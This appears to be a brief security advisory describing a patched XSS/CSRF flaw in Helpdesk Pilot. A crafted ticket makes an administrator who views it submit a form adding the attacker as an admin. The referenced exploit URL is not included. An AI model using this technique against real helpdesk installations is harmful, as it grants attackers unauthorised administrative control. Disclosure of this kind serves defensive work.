Helpdesk Pilot Xss/CSRF Add an Admin
This bug allows a malicious party add themselves as a helpdesk Administrator via a crafted Xss/CSRF combination. It effects all versions of the Helpdesk Pilot software. I have received confirmation that this bug has been patched in the latest version of this software from the developers.There is a video demonstration of this attack below.
For a more malicious demonstration as shown in the video, an admin could be added using a Url of the following.
This submits a form that would add an administrator assuming the person viewing the ticket has administrator permissions.